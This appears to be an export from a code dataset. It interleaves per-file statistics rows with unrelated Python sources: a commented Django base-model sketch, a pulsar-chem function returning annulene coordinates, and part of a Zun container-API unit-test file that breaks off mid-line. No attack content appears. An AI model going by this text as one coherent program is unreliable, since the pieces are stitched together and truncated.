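# created_at, modified_at, created_by, modified_by), which suggests they are
# generated from a shared abstract base. A minimal sketch of such a base
# (class name and exact definition are assumptions, not this project's code):
#
#     import uuid
#     from django.conf import settings
#     from django.db import models
#     from django.utils import timezone
#
#     class BaseModel(models.Model):
#         id = models.UUIDField(default=uuid.uuid4, editable=False,
#                               primary_key=True)
#         created_at = models.DateTimeField(
#             default=timezone.now, editable=False,
#             verbose_name='time of creation')
#         modified_at = models.DateTimeField(
#             default=timezone.now, editable=False,
#             verbose_name='time of modification')
#         created_by = models.ForeignKey(
#             settings.AUTH_USER_MODEL, blank=True, editable=False,
#             null=True, on_delete=models.CASCADE,
#             related_name='%(class)s_created', verbose_name='created by')
#         modified_by = models.ForeignKey(
#             settings.AUTH_USER_MODEL, blank=True, editable=False,
#             null=True, on_delete=models.CASCADE,
#             related_name='%(class)s_modified', verbose_name='modified by')
#
#         class Meta:
#             abstract = True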
| 70.396067 | 238 | 0.662184 | 2,705 | 25,061 | 5.960444 | 0.042514 | 0.083235 | 0.052968 | 0.083235 | 0.922533 | 0.904918 | 0.900577 | 0.882342 | 0.879179 | 0.875581 | 0 | 0.003116 | 0.205938 | 25,061 | 355 | 239 | 70.594366 | 0.807085 | 0.002673 | 0 | 0.639769 | 1 | 0 | 0.204474 | 0.050818 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017291 | 0 | 0.028818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fbfdcef145348dbdc97530179e7a68b156247005 | 2,198 | py | Python | lib/systems/annulene.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | ["BSD-3-Clause"] | null | null | null | lib/systems/annulene.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | ["BSD-3-Clause"] | null | null | null | lib/systems/annulene.py | pulsar-chem/BPModule | f8e64e04fdb01947708f098e833600c459c2ff0e | ["BSD-3-Clause"] | null | null | null |
import pulsar as psr
def load_ref_system():
""" Returns annulene as found in the IQMol fragment library.
All credit to https://github.com/nutjunkie/IQmol
"""
return psr.make_system("""
C 2.59675 1.49923 0.00000
C 2.59675 -1.49923 0.00000
C 0.00000 2.99846 0.00000
C 3.79405 0.72309 0.00000
C 2.52324 2.92420 0.00000
C 3.79405 -0.72309 0.00000
C 1.27081 3.64729 0.00000
C -0.00000 -2.99846 -0.00000
C -2.59675 1.49923 -0.00000
C 2.52324 -2.92420 0.00000
C -1.27081 3.64729 -0.00000
C -2.59675 -1.49923 -0.00000
C 1.27081 -3.64729 0.00000
C -2.52324 2.92420 -0.00000
C -1.27081 -3.64729 -0.00000
C -3.79405 0.72309 -0.00000
C -2.52324 -2.92420 -0.00000
C -3.79405 -0.72309 -0.00000
H 4.74967 1.23835 0.00000
H 3.44728 3.49416 0.00000
H 4.74967 -1.23835 0.00000
H 1.30239 4.73251 0.00000
H 3.44728 -3.49416 0.00000
H -1.30239 4.73251 -0.00000
H 1.30239 -4.73251 0.00000
H -3.44728 3.49416 -0.00000
H -1.30239 -4.73251 -0.00000
H -4.74967 1.23835 -0.00000
H -3.44728 -3.49416 -0.00000
H -4.74967 -1.23835 -0.00000
H 1.68959 0.97548 0.00000
H 1.68959 -0.97548 0.00000
H 0.00000 1.95097 0.00000
H -0.00000 -1.95097 -0.00000
H -1.68959 0.97548 -0.00000
H -1.68959 -0.97548 -0.00000
""")
| 49.954545 | 64 | 0.375341 | 281 | 2,198 | 2.925267 | 0.181495 | 0.291971 | 0.153285 | 0.077859 | 0.832117 | 0.832117 | 0.832117 | 0.832117 | 0.832117 | 0.816302 | 0 | 0.640316 | 0.539581 | 2,198 | 43 | 65 | 51.116279 | 0.171937 | 0.047771 | 0 | 0 | 0 | 0 | 0.959479 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025 | true | 0 | 0.025 | 0 | 0.075 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 12 |
2202cd45f3b541bef25d702ef049e7fb4bc56f42 | 115,023 | py | Python | zun/tests/unit/api/controllers/v1/test_containers.py | ZhaiMengdong/zun | 2c76e26335a9fd8ffb6624563dd5015278b01da9 | ["Apache-2.0"] | 3 | 2018-09-07T02:31:05.000Z | 2018-10-17T10:30:47.000Z | zun/tests/unit/api/controllers/v1/test_containers.py | ZhaiMengdong/zun | 2c76e26335a9fd8ffb6624563dd5015278b01da9 | ["Apache-2.0"] | null | null | null | zun/tests/unit/api/controllers/v1/test_containers.py | ZhaiMengdong/zun | 2c76e26335a9fd8ffb6624563dd5015278b01da9 | ["Apache-2.0"] | 1 | 2018-09-07T02:26:23.000Z | 2018-09-07T02:26:23.000Z |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from mock import patch
from webtest.app import AppError
from neutronclient.common import exceptions as n_exc
from oslo_utils import uuidutils
from zun.common import exception
from zun import objects
from zun.tests.unit.api import base as api_base
from zun.tests.unit.db import utils
from zun.tests.unit.objects import utils as obj_utils
class TestContainerController(api_base.FunctionalTest):
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_run_container(self, mock_search, mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
response = self.post('/v1/containers?run=true',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
self.assertTrue(mock_container_create.called)
self.assertTrue(mock_container_create.call_args[1]['run'] is True)
mock_neutron_get_network.assert_called_once()
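        # Note: ?run=true asks the API to create and immediately start the
        # container; the tests below cover run=false and rejection of
        # non-boolean values for the query parameter.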
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_run_container_wrong_run_value(self, mock_search,
mock_container_create):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
with self.assertRaisesRegex(AppError,
"Invalid input for query parameters"):
self.post('/v1/containers?run=xyz', params=params,
content_type='application/json')
@patch('zun.compute.api.API.container_create')
def test_run_container_wrong_memory_value(self, mock_container_create):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "3",'
'"environment": {"key1": "val1", "key2": "val2"}}')
with self.assertRaisesRegex(AppError,
"Invalid input for query parameters"):
self.post('/v1/containers?run=xyz', params=params,
content_type='application/json')
@patch('zun.compute.api.API.container_create')
def test_run_container_wrong_cpu_value(self, mock_container_create):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512", "cpu": "100"'
'"environment": {"key1": "val1", "key2": "val2"}}')
with self.assertRaisesRegex(AppError,
"Invalid input for query parameters"):
self.post('/v1/containers?run=xyz', params=params,
content_type='application/json')
@patch('zun.compute.api.API.container_create')
def test_run_container_wrong_disk_value(self, mock_container_create):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512", "disk": "0"'
'"environment": {"key1": "val1", "key2": "val2"}}')
with self.assertRaisesRegex(AppError,
"Invalid input for query parameters"):
self.post('/v1/containers?run=xyz', params=params,
content_type='application/json')
def test_run_container_runtime_wrong_api_version(self):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": "env", "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"runtime": "runc"}')
headers = {"OpenStack-API-Version": "container 1.4"}
with self.assertRaisesRegex(AppError,
"Invalid param runtime"):
self.post('/v1/containers?run=true',
params=params, content_type='application/json',
headers=headers)
def test_run_container_runtime_wrong_value(self):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"runtime": 1234}')
with self.assertRaisesRegex(AppError,
"Invalid input for field"):
self.post('/v1/containers?run=true',
params=params, content_type='application/json')
def test_run_container_with_hostname_wrong_api_version(self):
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": "env", "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"hostname": "testhost"}')
headers = {"OpenStack-API-Version": "container 1.7"}
with self.assertRaisesRegex(AppError,
"Invalid param hostname"):
self.post('/v1/containers?run=true',
params=params, content_type='application/json',
headers=headers)
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_run_container_with_false(self, mock_search,
mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
response = self.post('/v1/containers?run=false',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
self.assertTrue(mock_container_create.called)
self.assertTrue(mock_container_create.call_args[1]['run'] is False)
mock_neutron_get_network.assert_called_once()
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_run_container_with_wrong(self, mock_search,
mock_container_create):
mock_container_create.side_effect = exception.InvalidValue
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
self.assertRaises(AppError, self.post, '/v1/containers?run=wrong',
params=params, content_type='application/json')
        mock_container_create.assert_not_called()
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container(self, mock_search, mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
self.assertNotIn('host', response.json)
self.assertTrue(mock_container_create.called)
self.assertTrue(mock_container_create.call_args[1]['run'] is False)
mock_neutron_get_network.assert_called_once()
@patch('zun.common.context.RequestContext.can')
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_by_admin(
self, mock_search, mock_container_create, mock_neutron_get_network,
mock_can):
mock_container_create.side_effect = lambda x, y, **z: y
mock_can.return_value = True
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
self.assertIn('host', response.json)
self.assertTrue(mock_container_create.called)
self.assertTrue(mock_container_create.call_args[1]['run'] is False)
mock_neutron_get_network.assert_called_once()
@patch('zun.compute.api.API.container_create')
def test_create_container_image_not_specified(self, mock_container_create):
params = ('{"name": "MyDocker",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
with self.assertRaisesRegex(AppError,
"is a required property"):
self.post('/v1/containers/',
params=params,
content_type='application/json')
        mock_container_create.assert_not_called()
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_set_project_id_and_user_id(
self, mock_search, mock_container_create,
mock_neutron_get_network):
def _create_side_effect(cnxt, container, **kwargs):
self.assertEqual(self.context.project_id, container.project_id)
self.assertEqual(self.context.user_id, container.user_id)
return container
mock_container_create.side_effect = _create_side_effect
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
self.post('/v1/containers/',
params=params,
content_type='application/json')
mock_neutron_get_network.assert_called_once()
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_resp_has_status_reason(self, mock_search,
mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"}}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
self.assertIn('status_reason', response.json.keys())
mock_neutron_get_network.assert_called_once()
@patch('zun.common.policy.enforce')
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.container_delete')
@patch('zun.volume.cinder_api.CinderAPI.search_volume')
@patch('zun.volume.cinder_api.CinderAPI.ensure_volume_usable')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_full_params(self, mock_search,
mock_ensure_volume_usable,
mock_search_volume,
mock_container_delete,
mock_container_create,
mock_neutron_get_network,
mock_policy):
mock_policy.return_value = True
mock_container_create.side_effect = lambda x, y, **z: y
fake_network = {'id': 'foo'}
mock_neutron_get_network.return_value = fake_network
fake_volume_id = 'fakevolid'
fake_volume = mock.Mock(id=fake_volume_id)
mock_search_volume.return_value = fake_volume
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"runtime": "runc", "hostname": "testhost",'
'"disk": 20, "restart_policy": {"Name": "no"},'
'"nets": [{"network": "testpublicnet"}],'
'"mounts": [{"source": "s", "destination": "d"}]}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('MyDocker', c.get('name'))
self.assertEqual(["env"], c.get('command'))
self.assertEqual('512', c.get('memory'))
self.assertEqual({"key1": "val1", "key2": "val2"},
c.get('environment'))
self.assertEqual('runc', c.get('runtime'))
self.assertEqual('testhost', c.get('hostname'))
self.assertEqual(20, c.get('disk'))
self.assertEqual({"Name": "no", "MaximumRetryCount": "0"},
c.get('restart_policy'))
self.assertNotIn('host', c)
requested_networks = \
mock_container_create.call_args[1]['requested_networks']
self.assertEqual(1, len(requested_networks))
self.assertEqual(fake_network['id'], requested_networks[0]['network'])
requested_volumes = \
mock_container_create.call_args[1]['requested_volumes']
self.assertEqual(1, len(requested_volumes))
self.assertEqual(fake_volume_id, requested_volumes[0].volume_id)
# Delete the container we created
def side_effect(*args, **kwargs):
(ctx, cnt, force) = args
cnt.destroy(ctx)
mock_container_delete.side_effect = side_effect
response = self.delete(
'/v1/containers/%s?force=True' % c.get('uuid'))
self.assertEqual(204, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
c = response.json['containers']
self.assertEqual(0, len(c))
self.assertTrue(mock_container_create.called)
mock_neutron_get_network.assert_called_once()
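        # Note: the echo side effect (lambda x, y, **z: y) makes the mocked
        # compute API hand back the container object unchanged, so the API
        # layer persists it and the follow-up GET can read it back; the
        # delete side effect really destroys the DB row, which is why the
        # final listing is empty.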
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_minimum_params(self,
mock_search,
mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
fake_network = {'id': 'foo'}
mock_neutron_get_network.return_value = fake_network
# Create a container with a command
params = ('{"image": "ubuntu"}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertIsNotNone(c.get('name'))
        self.assertIsNone(c.get('command'))
self.assertEqual('2048', c.get('memory'))
self.assertEqual(1.0, c.get('cpu'))
# TODO(kiennt): Uncomment it when bug [1] be resolved.
# At this time, limit disk size feature will be ready.
# [1] https://bugs.launchpad.net/zun/+bug/1746401
# self.assertEqual(10, c.get('disk'))
self.assertEqual({}, c.get('environment'))
self.assertIsNone(c.get('runtime'))
self.assertIsNone(c.get('hostname'))
self.assertEqual({}, c.get('restart_policy'))
self.assertNotIn('host', c)
mock_neutron_get_network.assert_called_once()
requested_networks = \
mock_container_create.call_args[1]['requested_networks']
self.assertEqual(1, len(requested_networks))
self.assertEqual(fake_network['id'], requested_networks[0]['network'])
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_availability_zone(
self, mock_search, mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
fake_network = {'id': 'foo'}
mock_neutron_get_network.return_value = fake_network
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"],'
'"availability_zone": "test-az"}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('MyDocker', c.get('name'))
self.assertEqual(["env"], c.get('command'))
self.assertEqual('2048', c.get('memory'))
self.assertEqual(1.0, c.get('cpu'))
# TODO(kiennt): Uncomment it when bug [1] be resolved.
# At this time, limit disk size feature will be ready.
# [1] https://bugs.launchpad.net/zun/+bug/1746401
# self.assertEqual(10, c.get('disk'))
self.assertEqual({}, c.get('environment'))
self.assertNotIn('host', c)
mock_neutron_get_network.assert_called_once()
extra_spec = \
mock_container_create.call_args[1]['extra_spec']
self.assertEqual('test-az', extra_spec['availability_zone'])
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_restart_policy_no_retry_0(
self,
mock_search,
mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
fake_network = {'id': 'foo'}
mock_neutron_get_network.return_value = fake_network
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"restart_policy": {"Name": "no",'
'"MaximumRetryCount": "0"}}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('MyDocker', c.get('name'))
self.assertEqual(["env"], c.get('command'))
self.assertEqual('512', c.get('memory'))
self.assertEqual({"Name": "no", "MaximumRetryCount": "0"},
c.get('restart_policy'))
self.assertNotIn('host', c)
mock_neutron_get_network.assert_called_once()
requested_networks = \
mock_container_create.call_args[1]['requested_networks']
self.assertEqual(1, len(requested_networks))
self.assertEqual(fake_network['id'], requested_networks[0]['network'])
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_restart_policy_no_retry_6(
self,
mock_search,
mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
fake_network = {'id': 'foo'}
mock_neutron_get_network.return_value = fake_network
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"restart_policy": {"Name": "no",'
'"MaximumRetryCount": "6"}}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('MyDocker', c.get('name'))
self.assertEqual(["env"], c.get('command'))
self.assertEqual('512', c.get('memory'))
self.assertEqual({"Name": "no", "MaximumRetryCount": "0"},
c.get('restart_policy'))
self.assertNotIn('host', c)
mock_neutron_get_network.assert_called_once()
requested_networks = \
mock_container_create.call_args[1]['requested_networks']
self.assertEqual(1, len(requested_networks))
self.assertEqual(fake_network['id'], requested_networks[0]['network'])
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_restart_policy_unless_stopped(
self,
mock_search,
mock_container_create,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
fake_network = {'id': 'foo'}
mock_neutron_get_network.return_value = fake_network
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"restart_policy": {"Name": "unless-stopped",'
'"MaximumRetryCount": "0"}}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('MyDocker', c.get('name'))
self.assertEqual(["env"], c.get('command'))
self.assertEqual('512', c.get('memory'))
self.assertEqual({"Name": "unless-stopped", "MaximumRetryCount": "0"},
c.get('restart_policy'))
self.assertNotIn('host', c)
mock_neutron_get_network.assert_called_once()
requested_networks = \
mock_container_create.call_args[1]['requested_networks']
self.assertEqual(1, len(requested_networks))
self.assertEqual(fake_network['id'], requested_networks[0]['network'])
@patch('zun.common.policy.enforce')
@patch('neutronclient.v2_0.client.Client.show_port')
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.network.neutron.NeutronAPI.get_neutron_port')
@patch('zun.network.neutron.NeutronAPI.ensure_neutron_port_usable')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.container_delete')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_requested_neutron_port(
self, mock_search, mock_container_delete, mock_container_create,
mock_ensure_port_usable, mock_get_port,
mock_get_network, mock_show_port, mock_policy):
mock_policy.return_value = True
mock_container_create.side_effect = lambda x, y, **z: y
fake_port = {'network_id': 'foo', 'id': 'bar'}
fake_private_network = {'router:external': False, 'shared': False}
mock_get_port.return_value = fake_port
mock_get_network.return_value = fake_private_network
mock_show_port.return_value = {'port': fake_port}
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"nets": [{"port": "testport"}]}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('MyDocker', c.get('name'))
self.assertEqual(["env"], c.get('command'))
self.assertEqual('512', c.get('memory'))
self.assertEqual({"key1": "val1", "key2": "val2"},
c.get('environment'))
self.assertNotIn('host', c)
requested_networks = \
mock_container_create.call_args[1]['requested_networks']
self.assertEqual(1, len(requested_networks))
self.assertEqual(fake_port['network_id'],
requested_networks[0]['network'])
self.assertEqual(fake_port['id'], requested_networks[0]['port'])
self.assertTrue(requested_networks[0]['preserve_on_delete'])
def side_effect(*args, **kwargs):
(ctx, cnt, force) = args
cnt.destroy(ctx)
# Delete the container we created
mock_container_delete.side_effect = side_effect
response = self.delete(
'/v1/containers/%s?force=True' % c.get('uuid'))
self.assertEqual(204, response.status_int)
response = self.get('/v1/containers/')
self.assertEqual(200, response.status_int)
c = response.json['containers']
self.assertEqual(0, len(c))
self.assertTrue(mock_container_create.called)
@patch('zun.compute.api.API.container_create')
@patch('zun.common.context.RequestContext.can')
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.network.neutron.NeutronAPI.ensure_neutron_port_usable')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_public_network(
self, mock_search, mock_ensure_port_usable, mock_get_network,
mock_authorize, mock_container_create):
fake_public_network = {'id': 'fakepubnetid',
'router:external': True,
'shared': False}
mock_get_network.return_value = fake_public_network
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"nets": [{"network": "testpublicnet"}]}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
fake_admin_authorize = True
mock_authorize.return_value = fake_admin_authorize
self.assertEqual(202, response.status_int)
fake_not_admin_authorize = False
mock_authorize.return_value = fake_not_admin_authorize
response = self.post('/v1/containers/',
params=params,
content_type='application/json',
expect_errors=True)
self.assertEqual(403, response.status_int)
self.assertEqual('application/json', response.content_type)
self.assertEqual(
"It is not allowed to create an interface on external network %s" %
fake_public_network['id'], response.json['errors'][0]['detail'])
self.assertTrue(mock_container_create.not_called)
@patch('zun.compute.api.API.container_create')
@patch('zun.common.context.RequestContext.can')
@patch('zun.network.neutron.NeutronAPI.get_neutron_network')
@patch('zun.network.neutron.NeutronAPI.ensure_neutron_port_usable')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_ip_addr(
self, mock_search, mock_ensure_port_usable, mock_get_network,
mock_authorize, mock_container_create):
fake_network = {'id': 'fakenetid'}
mock_get_network.return_value = fake_network
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"environment": {"key1": "val1", "key2": "val2"},'
'"nets": [{"network": "fakenetid", "v4-fixed-ip": '
'"10.0.0.10"}]}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
fake_admin_authorize = True
mock_authorize.return_value = fake_admin_authorize
self.assertEqual(202, response.status_int)
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_show')
@patch('zun.compute.api.API.container_create')
@patch('zun.common.context.RequestContext.can')
@patch('zun.volume.cinder_api.CinderAPI.create_volume')
@patch('zun.volume.cinder_api.CinderAPI.ensure_volume_usable')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_create_new_volume(
self, mock_search, mock_ensure_volume_usable, mock_create_volume,
mock_authorize, mock_container_create, mock_container_show,
mock_neutron_get_network):
fake_network = {'id': 'foo'}
mock_neutron_get_network.return_value = fake_network
fake_volume_id = 'fakevolid'
fake_volume = mock.Mock(id=fake_volume_id)
mock_create_volume.return_value = fake_volume
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"mounts": [{"destination": "d", '
'"size": "5"}]}')
response = self.post('/v1/containers/',
params=params,
content_type='application/json')
self.assertEqual(202, response.status_int)
# get all containers
container = objects.Container.list(self.context)[0]
container.status = 'Creating'
mock_container_show.return_value = container
response = self.app.get('/v1/containers/')
self.assertEqual(200, response.status_int)
self.assertEqual(2, len(response.json))
c = response.json['containers'][0]
self.assertIsNotNone(c.get('uuid'))
self.assertEqual('MyDocker', c.get('name'))
self.assertEqual(["env"], c.get('command'))
self.assertEqual('Creating', c.get('status'))
self.assertEqual('512', c.get('memory'))
self.assertIn('host', c)
requested_networks = \
mock_container_create.call_args[1]['requested_networks']
self.assertEqual(1, len(requested_networks))
self.assertEqual(fake_network['id'], requested_networks[0]['network'])
mock_create_volume.assert_called_once()
requested_volumes = \
mock_container_create.call_args[1]['requested_volumes']
self.assertEqual(1, len(requested_volumes))
self.assertEqual(fake_volume_id, requested_volumes[0].volume_id)
@patch('zun.network.neutron.NeutronAPI.get_available_network')
@patch('zun.compute.api.API.container_show')
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_with_restart_policy_always_and_retrycount(
self,
mock_search,
mock_container_create,
mock_container_show,
mock_neutron_get_network):
mock_container_create.side_effect = lambda x, y, **z: y
# Create a container with a command
params = ('{"name": "MyDocker", "image": "ubuntu",'
'"command": ["env"], "memory": "512",'
'"restart_policy": {"Name": "always",'
'"MaximumRetryCount": "1"}}')
with self.assertRaisesRegex(
AppError, "maximum retry count not valid with"):
self.post('/v1/containers/',
params=params,
content_type='application/json')
        mock_container_create.assert_not_called()
mock_neutron_get_network.assert_called_once()
@patch('zun.compute.api.API.container_create')
@patch('zun.compute.api.API.image_search')
def test_create_container_invalid_long_name(self, mock_search,
mock_container_create):
# Long name
params = ('{"name": "' + 'i' * 256 + '", "image": "ubuntu",'
'"command": ["env"], "memory": "512"}')
self.assertRaises(AppError, self.post, '/v1/containers/',
params=params, content_type='application/json')
        mock_container_create.assert_not_called()
@patch('zun.objects.Container.list')
def test_get_all_containers(self, mock_container_list):
test_container = utils.get_test_container()
containers = [objects.Container(self.context, **test_container)]
mock_container_list.return_value = containers
response = self.get('/v1/containers/')
mock_container_list.assert_called_once_with(mock.ANY,
1000, None, 'id', 'asc',
filters={})
context = mock_container_list.call_args[0][0]
self.assertIs(False, context.all_projects)
self.assertEqual(200, response.status_int)
actual_containers = response.json['containers']
self.assertEqual(1, len(actual_containers))
self.assertEqual(test_container['uuid'],
